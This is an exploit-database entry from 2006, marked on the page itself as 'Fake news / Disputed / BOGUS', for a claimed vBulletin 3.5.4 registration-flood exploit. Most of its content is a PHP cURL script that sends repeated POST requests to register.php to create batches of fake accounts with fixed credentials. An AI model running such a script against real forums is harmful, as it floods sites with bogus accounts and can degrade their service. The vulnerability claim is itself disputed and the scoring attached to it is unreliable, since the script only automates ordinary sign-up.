WARNING! Fake news / Disputed / BOGUS

UPDATE vBulletin Version 3.5.4 exploit

2006.08.23
Credit: x-boy
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

####################### vBulletin Version 3.5.4 ######################### Script : vBulletin Version 3.5.4 site : www.vbulletin.com Exploit by : x-boy E-mail : Dicomdk (at) gmail (dot) com [email concealed] Type : Registration flood in register.php Thanks to : Simo64 ######################################################################## # Code of exploit (For english version , you can change it to other language)=> exploit.php cURL Must be activated (http://curl.haxx.se) Sorry for my bad English :-) ######################################################################## # <? set_time_limit(60); //You can change 10 to other numbers for($i = 1 ; $i <= 10 ; $i++) { //to put curl to send POST request $ch = curl_init(); //change http://localhost/vb3 to the url of the script curl_setopt($ch , CURLOPT_URL , 'http://localhost/vb3/register.php'); curl_setopt($ch , CURLOPT_POST , 1) ; curl_setopt($ch , CURLOPT_POSTFIELDS , 'agree=1&s=&do=addmember&url=index.php&password_md5=&passwordconfirm_md5 =&day=0&month=0&year=0&username=x-boy'.$i.'&password=elmehdi&passwordcon firm=elmehdi&email=dicomdk'.$i.'@gmail.com&emailconfirm=dicomdk'.$i.'@gm ail.com&referrername=&timezoneoffset=(GMT -12:00) Eniwetok, Kwajalein&dst=DST corrections always on&options[showemail]=1'); curl_exec($ch); curl_close($ch); } //Flood finished good luck ?> ######################################################################## ##


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2025, cxsecurity.com

 

Back to Top